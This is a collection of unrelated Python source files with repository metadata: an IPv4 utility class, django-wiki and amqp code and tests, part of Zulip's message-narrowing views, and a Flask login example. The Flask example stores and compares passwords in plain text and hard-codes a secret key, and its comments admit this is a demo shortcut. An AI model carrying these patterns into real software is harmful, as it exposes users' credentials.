print() #print so we can use newlines for next messages
print (" building: " + file_line_processed)
result = process_post(file_path, ciudad)
# add file to processed file-list
FILES_FOR_PROCESSED_LIST.append(file_line_processed)
print ("\n\n -------------------------------")
print (" updating proccesed file list...")
if len(FILES_FOR_PROCESSED_LIST) > 0:
update_processed_file(FILES_FOR_PROCESSED_LIST)
print ( "\n finished! ")
#listEvents()
|
eikiu/tdf-actividades
|
_admin-scripts/tdf_gcal.py
|
Python
|
cc0-1.0
| 28,476
| 0.034032
|
#!/usr/bin/python
"""nrvr.util.ipaddress - Utilities regarding IP addresses
Class provided by this module is IPAddress.
Works in Linux and Windows.
Idea and first implementation - Leo Baschy <srguiwiz12 AT nrvr DOT com>
Contributor - Nora Baschy
Public repository - https://github.com/srguiwiz/nrvr-commander
Copyright (c) Nirvana Research 2006-2015.
Simplified BSD License"""
import re
class IPAddress(object):
"""Methods for multiple machines on one subnet.
As implemented only supports IPv4."""
octetsRegex = re.compile(r"^\s*([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\s*$")
@classmethod
def asList(cls, ipaddress, rangeCheck=False):
"""For ipaddress="10.123.45.67" return mutable [10, 123, 45, 67].
If already a list, a copy is made and returned."""
if isinstance(ipaddress, basestring):
octetsMatch = IPAddress.octetsRegex.search(ipaddress)
if not octetsMatch:
raise Exception("won't recognize as IP address: {0}".format(ipaddress))
octets = [octetsMatch.group(1),
octetsMatch.group(2),
octetsMatch.group(3),
octetsMatch.group(4)]
for index, octet in enumerate(octets):
octet = int(octet)
if rangeCheck and octet > 255:
raise Exception("won't recognize as IP address because > 255: {0}".format(ipaddress))
octets[index] = octet
return octets
elif isinstance(ipaddress, (int, long)):
octets = []
while ipaddress:
octets.append(ipaddress % 256)
ipaddress /= 256
octets += [0 for i in range(max(4 - len(octets), 0))]
octets.reverse()
return octets
else:
# force making a copy
return list(ipaddress)
@classmethod
def asTuple(cls, ipaddress):
"""For ipaddress="10.123.45.67" return immutable (10, 123, 45, 67)."""
if isinstance(ipaddress, tuple):
return ipaddress
elif isinstance(ipaddress, list):
return tuple(ipaddress)
else:
return tuple(cls.asList(ipaddress))
@classmethod
def asString(cls, ipaddress):
"""For ipaddress=[10, 123, 45, 67] return "10.123.45.67"."""
if isinstance(ipaddress, basestring):
return ipaddress
if isinstance(ipaddress, (int, long)):
ipaddress = cls.asList(ipaddress)
return ".".join(map(str, ipaddress))
@classmethod
def asInteger(cls, ipaddress):
"""For ipaddress=[10, 123, 45, 67] return 175844675.
At the time of this writing, such an integer however is
not accepted as input by other methods of this class."""
octets = cls.asList(ipaddress) # must make a copy
integer = 0
while octets:
integer = 256 * integer + octets.pop(0)
return integer
@classmethod
def bitAnd(cls, one, other):
if not isinstance(one, (list, tuple)):
one = cls.asList(one)
if not isinstance(other, (list, tuple)):
other = cls.asList(other)
octets = []
for oneOctet, otherOctet in zip(one, other):
octets.append(oneOctet & otherOctet)
return octets
@classmethod
def bitOr(cls, one, other):
if not isinstance(one, (list, tuple)):
one = cls.asList(one)
if not isinstance(other, (list, tuple)):
other = cls.asList(other)
octets = []
for oneOctet, otherOctet in zip(one, other):
octets.append(oneOctet | otherOctet)
return octets
@classmethod
def bitNot(cls, one):
if not isinstance(one, (list, tuple)):
one = cls.asList(one)
octets = []
for oneOctet in one:
octets.append(~oneOctet & 255)
return octets
@classmethod
def nameWithNumber(cls, stem, ipaddress, octets=1, separator="-"):
"""For stem="example" and ipaddress="10.123.45.67" return "example-067".
If octets=2 return "example-045-067"."""
name = stem
ipaddress = IPAddress.asTuple(ipaddress)
if not separator:
# empty string instead of e.g. None
separator = ""
for index in range(-octets, 0):
# create leading zeros, e.g. from "19" to "019"
name += separator + "%03d" % ipaddress[index]
return name
@classmethod
def numberWithinSubnet(cls, oneInSubnet, otherNumber, netmask="255.255.255.0"):
"""For oneInSubnet="10.123.45.67" and otherNumber="89" return [10, 123, 45, 89].
For oneInSubnet="10.123.45.67" and otherNumber="89.34" and netmask="255.255.0.0" return [10, 123, 89, 34]."""
if not isinstance(oneInSubnet, (list, tuple)):
oneInSubnet = cls.asList(oneInSubnet)
# less than stellar decoding of otherNumber, but it works in actual use cases
if isinstance(otherNumber, int):
# in theory handling more than 16 bits' 65536 would be desirable,
# practically handling up to 16 bits' 65535 is enough
if otherNumber <= 255:
otherNumber = [otherNumber]
else:
otherNumber = [otherNumber >> 8, otherNumber & 255]
if not isinstance(otherNumber, (list, tuple)):
otherNumber = otherNumber.split(".")
otherNumber = map(int, otherNumber)
if not isinstance(netmask, (list, tuple)):
netmask = cls.asList(netmask)
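        # combine the network part of oneInSubnet with the host part of otherNumber,
        # e.g. (10.123.45.67 & 255.255.255.0) | (0.0.0.89 & 0.0.0.255) -> 10.123.45.89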
complementOfNetmask = cls.bitNot(netmask)
contributedBySubnet = cls.bitAnd(oneInSubnet, netmask)
otherNumber = [0] * (len(contributedBySubnet) - len(otherNumber)) + otherNumber
contributedByNumber = cls.bitAnd(otherNumber, complementOfNetmask)
result = cls.bitOr(contributedBySubnet, contributedByNumber)
return result
if __name__ == "__main__":
print IPAddress.asList("10.123.45.67")
print IPAddress.asList((192, 168, 95, 17))
print IPAddress.asList([192, 168, 95, 17])
print IPAddress.asList(175844675)
print IPAddress.asTuple("10.123.45.67")
print IPAddress.asTuple([192, 168, 95, 17])
print IPAddress.asTuple((192, 168, 95, 17))
print IPAddress.asTuple(175844675)
print IPAddress.asString([192, 168, 95, 17])
print IPAddress.asString((192, 168, 95, 17))
print IPAddress.asString("10.123.45.67")
print IPAddress.asString(175844675)
print IPAddress.asInteger("10.123.45.67")
print IPAddress.asInteger([10,123,45,67])
print IPAddress.bitAnd("10.123.45.67", "255.255.255.0")
print IPAddress.bitOr(IPAddress.bitAnd("10.123.45.67", "255.255.255.0"), "0.0.0.1")
print IPAddress.bitNot("1.2.3.4")
print IPAddress.nameWithNumber("example", "10.123.45.67")
print IPAddress.nameWithNumber("example", "10.123.45.67", octets=2)
print IPAddress.nameWithNumber("example", "10.123.45.67", octets=3)
print IPAddress.nameWithNumber("example", "10.123.45.67", octets=4)
print IPAddress.numberWithinSubnet("10.123.45.67", "89")
print IPAddress.numberWithinSubnet("10.123.45.67", 89)
print IPAddress.numberWithinSubnet("10.123.45.67", "89.34", netmask="255.255.0.0")
print IPAddress.numberWithinSubnet("10.123.45.67", 22818, netmask="255.255.0.0")
|
srguiwiz/nrvr-commander
|
src/nrvr/util/ipaddress.py
|
Python
|
bsd-2-clause
| 7,449
| 0.003088
|
from flask import Flask, url_for, redirect, render_template, request
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext import superadmin, login, wtf
from flask.ext.superadmin.contrib import sqlamodel
from wtforms.fields import TextField, PasswordField
from wtforms.validators import Required, ValidationError
# Create application
app = Flask(__name__)
# Create dummy secret key so we can use sessions
app.config['SECRET_KEY'] = '123456790'
# Create in-memory database
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.sqlite'
app.config['SQLALCHEMY_ECHO'] = True
db = SQLAlchemy(app)
# Create user model. For simplicity, it will store passwords in plain text.
# Obviously that's not the right thing to do in a real-world application.
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
login = db.Column(db.String(80), unique=True)
email = db.Column(db.String(120))
password = db.Column(db.String(64))
# Flask-Login integration
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return self.id
# Required for administrative interface
def __unicode__(self):
return self.login
# Define login and registration forms (for flask-login)
class LoginForm(wtf.Form):
login = TextField(validators=[Required()])
password = PasswordField(validators=[Required()])
def validate_login(self, field):
user = self.get_user()
if user is None:
raise ValidationError('Invalid user')
if user.password != self.password.data:
raise ValidationError('Invalid password')
def get_user(self):
return db.session.query(User).filter_by(login=self.login.data).first()
class RegistrationForm(wtf.Form):
login = TextField(validators=[Required()])
email = TextField()
password = PasswordField(validators=[Required()])
def validate_login(self, field):
if db.session.query(User).filter_by(login=self.login.data).count() > 0:
raise ValidationError('Duplicate username')
# Initialize flask-login
def init_login():
login_manager = login.LoginManager()
login_manager.setup_app(app)
# Create user loader function
@login_manager.user_loader
def load_user(user_id):
return db.session.query(User).get(user_id)
# Create customized model view class
class MyModelView(sqlamodel.ModelView):
def is_accessible(self):
return login.current_user.is_authenticated()
# Create customized index view class
class MyAdminIndexView(superadmin.AdminIndexView):
def is_accessible(self):
return login.current_user.is_authenticated()
# Flask views
@app.route('/')
def index():
return render_template('index.html', user=login.current_user)
@app.route('/login/', methods=('GET', 'POST'))
def login_view():
form = LoginForm(request.form)
if form.validate_on_submit():
user = form.get_user()
login.login_user(user)
return redirect(url_for('index'))
return render_template('form.html', form=form)
@app.route('/register/', methods=('GET', 'POST'))
def register_view():
form = RegistrationForm(request.form)
if form.validate_on_submit():
user = User()
form.populate_obj(user)
db.session.add(user)
db.session.commit()
login.login_user(user)
return redirect(url_for('index'))
return render_template('form.html', form=form)
@app.route('/logout/')
def logout_view():
login.logout_user()
return redirect(url_for('index'))
if __name__ == '__main__':
# Initialize flask-login
init_login()
# Create admin
admin = superadmin.Admin(app, 'Auth', index_view=MyAdminIndexView())
# Add view
admin.add_view(MyModelView(User, db.session))
# Create DB
db.create_all()
# Start app
app.debug = True
app.run()
|
syrusakbary/Flask-SuperAdmin
|
examples/auth/auth.py
|
Python
|
bsd-3-clause
| 3,960
| 0.000253
|
# -*- coding: utf-8 -*-
from django.conf.urls.defaults import patterns, url
from django.utils.translation import ugettext_lazy as _
from wiki.core.plugins import registry
from wiki.core.plugins.base import BasePlugin
from wiki.plugins.attachments import views
from wiki.plugins.attachments import models
from wiki.plugins.attachments import settings
from wiki.plugins.attachments.markdown_extensions import AttachmentExtension
from wiki.plugins.notifications import ARTICLE_EDIT
class AttachmentPlugin(BasePlugin):
#settings_form = 'wiki.plugins.notifications.forms.SubscriptionForm'
slug = settings.SLUG
urlpatterns = patterns('',
url(r'^$', views.AttachmentView.as_view(), name='attachments_index'),
url(r'^search/$', views.AttachmentSearchView.as_view(), name='attachments_search'),
url(r'^add/(?P<attachment_id>\d+)/$', views.AttachmentAddView.as_view(), name='attachments_add'),
url(r'^replace/(?P<attachment_id>\d+)/$', views.AttachmentReplaceView.as_view(), name='attachments_replace'),
url(r'^history/(?P<attachment_id>\d+)/$', views.AttachmentHistoryView.as_view(), name='attachments_history'),
url(r'^download/(?P<attachment_id>\d+)/$', views.AttachmentDownloadView.as_view(), name='attachments_download'),
url(r'^delete/(?P<attachment_id>\d+)/$', views.AttachmentDeleteView.as_view(), name='attachments_delete'),
url(r'^download/(?P<attachment_id>\d+)/revision/(?P<revision_id>\d+)/$', views.AttachmentDownloadView.as_view(), name='attachments_download'),
url(r'^change/(?P<attachment_id>\d+)/revision/(?P<revision_id>\d+)/$', views.AttachmentChangeRevisionView.as_view(), name='attachments_revision_change'),
)
article_tab = (_(u'Attachments'), "icon-file")
article_view = views.AttachmentView().dispatch
# List of notifications to construct signal handlers for. This
# is handled inside the notifications plugin.
notifications = [{'model': models.AttachmentRevision,
'message': lambda obj: (_(u"A file was changed: %s") if not obj.deleted else _(u"A file was deleted: %s")) % obj.get_filename(),
'key': ARTICLE_EDIT,
'created': True,
'get_article': lambda obj: obj.attachment.article}
]
markdown_extensions = [AttachmentExtension()]
def __init__(self):
#print "I WAS LOADED!"
pass
registry.register(AttachmentPlugin)
|
GbalsaC/bitnamiP
|
django-wiki/wiki/plugins/attachments/wiki_plugin.py
|
Python
|
agpl-3.0
| 2,509
| 0.008768
|
from __future__ import absolute_import, unicode_literals
from case import Mock, patch
from amqp.five import text_t
from amqp.utils import (NullHandler, bytes_to_str, coro, get_errno, get_logger,
str_to_bytes)
class test_get_errno:
def test_has_attr(self):
exc = KeyError('foo')
exc.errno = 23
assert get_errno(exc) == 23
def test_in_args(self):
exc = KeyError(34, 'foo')
exc.args = (34, 'foo')
assert get_errno(exc) == 34
def test_args_short(self):
exc = KeyError(34)
assert not get_errno(exc)
def test_no_args(self):
assert not get_errno(object())
class test_coro:
def test_advances(self):
@coro
def x():
yield 1
yield 2
it = x()
assert next(it) == 2
class test_str_to_bytes:
def test_from_unicode(self):
assert isinstance(str_to_bytes(u'foo'), bytes)
def test_from_bytes(self):
assert isinstance(str_to_bytes(b'foo'), bytes)
def test_supports_surrogates(self):
bytes_with_surrogates = '\ud83d\ude4f'.encode('utf-8', 'surrogatepass')
assert str_to_bytes(u'\ud83d\ude4f') == bytes_with_surrogates
class test_bytes_to_str:
def test_from_unicode(self):
assert isinstance(bytes_to_str(u'foo'), text_t)
def test_from_bytes(self):
assert bytes_to_str(b'foo')
def test_support_surrogates(self):
assert bytes_to_str(u'\ud83d\ude4f') == u'\ud83d\ude4f'
class test_NullHandler:
def test_emit(self):
NullHandler().emit(Mock(name='record'))
class test_get_logger:
def test_as_str(self):
with patch('logging.getLogger') as getLogger:
x = get_logger('foo.bar')
getLogger.assert_called_with('foo.bar')
assert x is getLogger()
def test_as_logger(self):
with patch('amqp.utils.NullHandler') as _NullHandler:
m = Mock(name='logger')
m.handlers = None
x = get_logger(m)
assert x is m
x.addHandler.assert_called_with(_NullHandler())
|
pexip/os-python-amqp
|
t/unit/test_utils.py
|
Python
|
lgpl-2.1
| 2,126
| 0
|
from __future__ import absolute_import
from django.conf import settings
from django.core import validators
from django.core.exceptions import ValidationError
from django.db import connection
from django.db.models import Q
from zerver.decorator import authenticated_api_view, authenticated_json_post_view, \
has_request_variables, REQ, JsonableError, \
to_non_negative_int, to_non_negative_float
from django.utils.html import escape as escape_html
from django.views.decorators.csrf import csrf_exempt
from zerver.lib import bugdown
from zerver.lib.actions import recipient_for_emails, do_update_message_flags, \
compute_mit_user_fullname, compute_irc_user_fullname, compute_jabber_user_fullname, \
create_mirror_user_if_needed, check_send_message, do_update_message, \
extract_recipients
from zerver.lib.cache import generic_bulk_cached_fetch
from zerver.lib.query import last_n
from zerver.lib.response import json_success, json_error
from zerver.lib.utils import statsd
from zerver.lib.validator import \
check_list, check_int, check_dict, check_string, check_bool
from zerver.models import Message, UserProfile, Stream, Subscription, \
Recipient, UserMessage, bulk_get_recipients, get_recipient, \
get_user_profile_by_email, get_stream, valid_stream_name, \
parse_usermessage_flags, to_dict_cache_key_id, extract_message_dict, \
stringify_message_dict, \
resolve_email_to_domain, get_realm, get_active_streams, \
bulk_get_streams
import sqlalchemy
from sqlalchemy import func
from sqlalchemy.sql import select, join, column, literal_column, literal, and_, \
or_, not_, union_all, alias
import re
import ujson
from zerver.lib.rest import rest_dispatch as _rest_dispatch
rest_dispatch = csrf_exempt((lambda request, *args, **kwargs: _rest_dispatch(request, globals(), *args, **kwargs)))
# This is a Pool that doesn't close connections. Therefore it can be used with
# existing Django database connections.
class NonClosingPool(sqlalchemy.pool.NullPool):
def status(self):
return "NonClosingPool"
def _do_return_conn(self, conn):
pass
def recreate(self):
return self.__class__(creator=self._creator,
recycle=self._recycle,
use_threadlocal=self._use_threadlocal,
reset_on_return=self._reset_on_return,
echo=self.echo,
logging_name=self._orig_logging_name,
_dispatch=self.dispatch)
sqlalchemy_engine = None
def get_sqlalchemy_connection():
global sqlalchemy_engine
if sqlalchemy_engine is None:
def get_dj_conn():
connection.ensure_connection()
return connection.connection
sqlalchemy_engine = sqlalchemy.create_engine('postgresql://',
creator=get_dj_conn,
poolclass=NonClosingPool,
pool_reset_on_return=False)
sa_connection = sqlalchemy_engine.connect()
sa_connection.execution_options(autocommit=False)
return sa_connection
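# Illustrative (hypothetical) usage of the helper above: the returned SQLAlchemy
# connection wraps the same psycopg2 connection Django holds, so queries issued
# through it share Django's transaction, e.g.:
#
#     sa_conn = get_sqlalchemy_connection()
#     rows = sa_conn.execute(
#         select([column("id")], None, "zerver_message").limit(1)
#     ).fetchall()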
@authenticated_json_post_view
def json_get_old_messages(request, user_profile):
return get_old_messages_backend(request, user_profile)
class BadNarrowOperator(Exception):
def __init__(self, desc):
self.desc = desc
def to_json_error_msg(self):
return 'Invalid narrow operator: ' + self.desc
# When you add a new operator to this, also update zerver/lib/narrow.py
class NarrowBuilder(object):
def __init__(self, user_profile, msg_id_column):
self.user_profile = user_profile
self.msg_id_column = msg_id_column
def add_term(self, query, term):
# We have to be careful here because we're letting users call a method
# by name! The prefix 'by_' prevents it from colliding with builtin
# Python __magic__ stuff.
operator = term['operator']
operand = term['operand']
negated = term.get('negated', False)
method_name = 'by_' + operator.replace('-', '_')
method = getattr(self, method_name, None)
if method is None:
raise BadNarrowOperator('unknown operator ' + operator)
if negated:
maybe_negate = not_
else:
maybe_negate = lambda cond: cond
return method(query, operand, maybe_negate)
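    # For illustration (term format as produced by narrow_parameter below): a
    # term like {'operator': 'stream', 'operand': 'social'} dispatches to
    # by_stream(), and 'pm-with' dispatches to by_pm_with() after the '-' to '_'
    # replacement; unknown operators raise BadNarrowOperator.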
def by_has(self, query, operand, maybe_negate):
if operand not in ['attachment', 'image', 'link']:
raise BadNarrowOperator("unknown 'has' operand " + operand)
col_name = 'has_' + operand
cond = column(col_name)
return query.where(maybe_negate(cond))
def by_in(self, query, operand, maybe_negate):
if operand == 'home':
conditions = exclude_muting_conditions(self.user_profile, [])
return query.where(and_(*conditions))
elif operand == 'all':
return query
raise BadNarrowOperator("unknown 'in' operand " + operand)
def by_is(self, query, operand, maybe_negate):
if operand == 'private':
query = query.select_from(join(query.froms[0], "zerver_recipient",
column("recipient_id") ==
literal_column("zerver_recipient.id")))
cond = or_(column("type") == Recipient.PERSONAL,
column("type") == Recipient.HUDDLE)
return query.where(maybe_negate(cond))
elif operand == 'starred':
cond = column("flags").op("&")(UserMessage.flags.starred.mask) != 0
return query.where(maybe_negate(cond))
elif operand == 'mentioned' or operand == 'alerted':
cond = column("flags").op("&")(UserMessage.flags.mentioned.mask) != 0
return query.where(maybe_negate(cond))
raise BadNarrowOperator("unknown 'is' operand " + operand)
_alphanum = frozenset(
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
def _pg_re_escape(self, pattern):
"""
Escape user input to place in a regex
Python's re.escape escapes unicode characters in a way which postgres
fails on, u'\u03bb' to u'\\\u03bb'. This function will correctly escape
them for postgres, u'\u03bb' to u'\\u03bb'.
"""
s = list(pattern)
for i, c in enumerate(s):
if c not in self._alphanum:
if c == '\000':
                    s[i] = '\\000'
elif ord(c) >= 128:
# convert the character to hex postgres regex will take
# \uXXXX
s[i] = '\\u{:0>4x}'.format(ord(c))
else:
s[i] = '\\' + c
return ''.join(s)
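    # Sketch of the intended behaviour (hypothetical inputs):
    #   _pg_re_escape(u'foo.bar')  -> u'foo\\.bar'
    #   _pg_re_escape(u'\u03bb')   -> u'\\u03bb'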
def by_stream(self, query, operand, maybe_negate):
stream = get_stream(operand, self.user_profile.realm)
if stream is None:
raise BadNarrowOperator('unknown stream ' + operand)
if self.user_profile.realm.domain == "mit.edu":
# MIT users expect narrowing to "social" to also show messages to /^(un)*social(.d)*$/
# (unsocial, ununsocial, social.d, etc)
m = re.search(r'^(?:un)*(.+?)(?:\.d)*$', stream.name, re.IGNORECASE)
if m:
base_stream_name = m.group(1)
else:
base_stream_name = stream.name
matching_streams = get_active_streams(self.user_profile.realm).filter(
name__iregex=r'^(un)*%s(\.d)*$' % (self._pg_re_escape(base_stream_name),))
matching_stream_ids = [matching_stream.id for matching_stream in matching_streams]
recipients = bulk_get_recipients(Recipient.STREAM, matching_stream_ids).values()
cond = column("recipient_id").in_([recipient.id for recipient in recipients])
return query.where(maybe_negate(cond))
recipient = get_recipient(Recipient.STREAM, type_id=stream.id)
cond = column("recipient_id") == recipient.id
return query.where(maybe_negate(cond))
def by_topic(self, query, operand, maybe_negate):
if self.user_profile.realm.domain == "mit.edu":
# MIT users expect narrowing to topic "foo" to also show messages to /^foo(.d)*$/
# (foo, foo.d, foo.d.d, etc)
m = re.search(r'^(.*?)(?:\.d)*$', operand, re.IGNORECASE)
if m:
base_topic = m.group(1)
else:
base_topic = operand
# Additionally, MIT users expect the empty instance and
# instance "personal" to be the same.
if base_topic in ('', 'personal', '(instance "")'):
regex = r'^(|personal|\(instance ""\))(\.d)*$'
else:
regex = r'^%s(\.d)*$' % (self._pg_re_escape(base_topic),)
cond = column("subject").op("~*")(regex)
return query.where(maybe_negate(cond))
cond = func.upper(column("subject")) == func.upper(literal(operand))
return query.where(maybe_negate(cond))
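    # e.g. (illustration) on an mit.edu realm, operand 'foo.d' collapses to the
    # base topic 'foo' and is matched against the postgres regex r'^foo(\.d)*$'
    # case-insensitively via the ~* operator.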
def by_sender(self, query, operand, maybe_negate):
try:
sender = get_user_profile_by_email(operand)
except UserProfile.DoesNotExist:
raise BadNarrowOperator('unknown user ' + operand)
cond = column("sender_id") == literal(sender.id)
return query.where(maybe_negate(cond))
def by_near(self, query, operand, maybe_negate):
return query
def by_id(self, query, operand, maybe_negate):
cond = self.msg_id_column == literal(operand)
return query.where(maybe_negate(cond))
def by_pm_with(self, query, operand, maybe_negate):
if ',' in operand:
# Huddle
try:
emails = [e.strip() for e in operand.split(',')]
recipient = recipient_for_emails(emails, False,
self.user_profile, self.user_profile)
except ValidationError:
raise BadNarrowOperator('unknown recipient ' + operand)
cond = column("recipient_id") == recipient.id
return query.where(maybe_negate(cond))
else:
# Personal message
self_recipient = get_recipient(Recipient.PERSONAL, type_id=self.user_profile.id)
if operand == self.user_profile.email:
# Personals with self
cond = and_(column("sender_id") == self.user_profile.id,
column("recipient_id") == self_recipient.id)
return query.where(maybe_negate(cond))
# Personals with other user; include both directions.
try:
narrow_profile = get_user_profile_by_email(operand)
except UserProfile.DoesNotExist:
raise BadNarrowOperator('unknown user ' + operand)
narrow_recipient = get_recipient(Recipient.PERSONAL, narrow_profile.id)
cond = or_(and_(column("sender_id") == narrow_profile.id,
column("recipient_id") == self_recipient.id),
and_(column("sender_id") == self.user_profile.id,
column("recipient_id") == narrow_recipient.id))
return query.where(maybe_negate(cond))
def by_search(self, query, operand, maybe_negate):
tsquery = func.plainto_tsquery(literal("zulip.english_us_search"), literal(operand))
ts_locs_array = func.ts_match_locs_array
query = query.column(ts_locs_array(literal("zulip.english_us_search"),
column("rendered_content"),
tsquery).label("content_matches"))
# We HTML-escape the subject in Postgres to avoid doing a server round-trip
query = query.column(ts_locs_array(literal("zulip.english_us_search"),
func.escape_html(column("subject")),
tsquery).label("subject_matches"))
# Do quoted string matching. We really want phrase
# search here so we can ignore punctuation and do
# stemming, but there isn't a standard phrase search
# mechanism in Postgres
for term in re.findall('"[^"]+"|\S+', operand):
if term[0] == '"' and term[-1] == '"':
term = term[1:-1]
term = '%' + connection.ops.prep_for_like_query(term) + '%'
cond = or_(column("content").ilike(term),
column("subject").ilike(term))
query = query.where(maybe_negate(cond))
cond = column("search_tsvector").op("@@")(tsquery)
return query.where(maybe_negate(cond))
def highlight_string(string, locs):
if isinstance(string, unicode):
string = string.encode('utf-8')
highlight_start = '<span class="highlight">'
highlight_stop = '</span>'
pos = 0
result = ''
for loc in locs:
(offset, length) = loc
result += string[pos:offset]
result += highlight_start
result += string[offset:offset + length]
result += highlight_stop
pos = offset + length
result += string[pos:]
return result.decode('utf-8')
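# Example with hypothetical values: highlight_string(u'hello world', [(6, 5)])
# returns u'hello <span class="highlight">world</span>'.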
def get_search_fields(rendered_content, subject, content_matches, subject_matches):
return dict(match_content=highlight_string(rendered_content, content_matches),
match_subject=highlight_string(escape_html(subject), subject_matches))
def narrow_parameter(json):
# FIXME: A hack to support old mobile clients
if json == '{}':
return None
data = ujson.loads(json)
if not isinstance(data, list):
raise ValueError("argument is not a list")
def convert_term(elem):
# We have to support a legacy tuple format.
if isinstance(elem, list):
if (len(elem) != 2
or any(not isinstance(x, str) and not isinstance(x, unicode)
for x in elem)):
raise ValueError("element is not a string pair")
return dict(operator=elem[0], operand=elem[1])
if isinstance(elem, dict):
validator = check_dict([
('operator', check_string),
('operand', check_string),
])
error = validator('elem', elem)
if error:
raise JsonableError(error)
# whitelist the fields we care about for now
return dict(
operator=elem['operator'],
operand=elem['operand'],
negated=elem.get('negated', False),
)
raise ValueError("element is not a dictionary")
return map(convert_term, data)
def is_public_stream(stream, realm):
if not valid_stream_name(stream):
raise JsonableError("Invalid stream name")
stream = get_stream(stream, realm)
if stream is None:
return False
return stream.is_public()
def ok_to_include_history(narrow, realm):
# There are occasions where we need to find Message rows that
# have no corresponding UserMessage row, because the user is
# reading a public stream that might include messages that
# were sent while the user was not subscribed, but which they are
# allowed to see. We have to be very careful about constructing
# queries in those situations, so this function should return True
# only if we are 100% sure that we're gonna add a clause to the
# query that narrows to a particular public stream on the user's realm.
# If we screw this up, then we can get into a nasty situation of
# polluting our narrow results with messages from other realms.
include_history = False
if narrow is not None:
for term in narrow:
if term['operator'] == "stream" and not term.get('negated', False):
if is_public_stream(term['operand'], realm):
include_history = True
# Disable historical messages if the user is narrowing on anything
# that's a property on the UserMessage table. There cannot be
# historical messages in these cases anyway.
for term in narrow:
if term['operator'] == "is":
include_history = False
return include_history
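# For example (hypothetical narrow): [{'operator': 'stream', 'operand': 'social'}]
# on a public stream returns True, but adding {'operator': 'is', 'operand':
# 'starred'} flips it back to False, because 'is' narrows on per-user
# UserMessage state for which no historical rows can exist.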
def get_stream_name_from_narrow(narrow):
for term in narrow:
if term['operator'] == 'stream':
return term['operand'].lower()
return None
def exclude_muting_conditions(user_profile, narrow):
conditions = []
stream_name = get_stream_name_from_narrow(narrow)
if stream_name is None:
rows = Subscription.objects.filter(
user_profile=user_profile,
active=True,
in_home_view=False,
recipient__type=Recipient.STREAM
).values('recipient_id')
muted_recipient_ids = map(lambda row: row['recipient_id'], rows)
condition = not_(column("recipient_id").in_(muted_recipient_ids))
conditions.append(condition)
muted_topics = ujson.loads(user_profile.muted_topics)
if muted_topics:
if stream_name is not None:
muted_topics = [m for m in muted_topics if m[0].lower() == stream_name]
if not muted_topics:
return conditions
muted_streams = bulk_get_streams(user_profile.realm,
[muted[0] for muted in muted_topics])
muted_recipients = bulk_get_recipients(Recipient.STREAM,
[stream.id for stream in muted_streams.itervalues()])
recipient_map = dict((s.name.lower(), muted_recipients[s.id].id)
for s in muted_streams.itervalues())
muted_topics = [m for m in muted_topics if m[0].lower() in recipient_map]
if muted_topics:
def mute_cond(muted):
stream_cond = column("recipient_id") == recipient_map[muted[0].lower()]
topic_cond = func.upper(column("subject")) == func.upper(muted[1])
return and_(stream_cond, topic_cond)
condition = not_(or_(*map(mute_cond, muted_topics)))
return conditions + [condition]
return conditions
@has_request_variables
def get_old_messages_backend(request, user_profile,
anchor = REQ(converter=int),
num_before = REQ(converter=to_non_negative_int),
num_after = REQ(converter=to_non_negative_int),
narrow = REQ('narrow', converter=narrow_parameter, default=None),
use_first_unread_anchor = REQ(default=False, converter=ujson.loads),
apply_markdown=REQ(default=True,
converter=ujson.loads)):
include_history = ok_to_include_history(narrow, user_profile.realm)
if include_history and not use_first_unread_anchor:
query = select([column("id").label("message_id")], None, "zerver_message")
inner_msg_id_col = literal_column("zerver_message.id")
elif narrow is None:
query = select([column("message_id"), column("flags")],
column("user_profile_id") == literal(user_profile.id),
"zerver_usermessage")
inner_msg_id_col = column("message_id")
else:
# TODO: Don't do this join if we're not doing a search
query = select([column("message_id"), column("flags")],
column("user_profile_id") == literal(user_profile.id),
join("zerver_usermessage", "zerver_message",
literal_column("zerver_usermessage.message_id") ==
literal_column("zerver_message.id")))
inner_msg_id_col = column("message_id")
num_extra_messages = 1
is_search = False
if narrow is not None:
# Add some metadata to our logging data for narrows
verbose_operators = []
for term in narrow:
if term['operator'] == "is":
verbose_operators.append("is:" + term['operand'])
else:
verbose_operators.append(term['operator'])
request._log_data['extra'] = "[%s]" % (",".join(verbose_operators),)
# Build the query for the narrow
num_extra_messages = 0
builder = NarrowBuilder(user_profile, inner_msg_id_col)
for term in narrow:
if term['operator'] == 'search' and not is_search:
query = query.column("subject").column("rendered_content")
is_search = True
query = builder.add_term(query, term)
# We add 1 to the number of messages requested if no narrow was
# specified to ensure that the resulting list always contains the
# anchor message. If a narrow was specified, the anchor message
# might not match the narrow anyway.
if num_after != 0:
num_after += num_extra_messages
else:
num_before += num_extra_messages
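    # e.g. (hypothetical request) anchor=100, num_before=0, num_after=10 with no
    # narrow becomes num_after=11, so the anchor message id 100 is returned
    # together with the 10 messages after it.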
sa_conn = get_sqlalchemy_connection()
if use_first_unread_anchor:
condition = column("flags").op("&")(UserMessage.flags.read.mask) == 0
# We exclude messages on muted topics when finding the first unread
# message in this narrow
muting_conditions = exclude_muting_conditions(user_profile, narrow)
if muting_conditions:
condition = and_(condition, *muting_conditions)
first_unread_query = query.where(condition)
first_unread_query = first_unread_query.order_by(inner_msg_id_col.asc()).limit(1)
first_unread_result = list(sa_conn.execute(first_unread_query).fetchall())
if len(first_unread_result) > 0:
anchor = first_unread_result[0][0]
else:
anchor = 10000000000000000
before_query = None
after_query = None
if num_before != 0:
before_anchor = anchor
if num_after != 0:
# Don't include the anchor in both the before query and the after query
before_anchor = anchor - 1
before_query = query.where(inner_msg_id_col <= before_anchor) \
.order_by(inner_msg_id_col.desc()).limit(num_before)
if num_after != 0:
after_query = query.where(inner_msg_id_col >= anchor) \
.order_by(inner_msg_id_col.asc()).limit(num_after)
if num_before == 0 and num_after == 0:
# This can happen when a narrow is specified.
after_query = query.where(inner_msg_id_col == anchor)
if before_query is not None:
if after_query is not None:
query = union_all(before_query.self_group(), after_query.self_group())
else:
query = before_query
else:
query = after_query
main_query = alias(query)
query = select(main_query.c, None, main_query).order_by(column("message_id").asc())
# This is a hack to tag the query we use for testing
query = query.prefix_with("/* get_old_messages */")
query_result = list(sa_conn.execute(query).fetchall())
# The following is a little messy, but ensures that the code paths
# are similar regardless of the value of include_history. The
# 'user_messages' dictionary maps each message to the user's
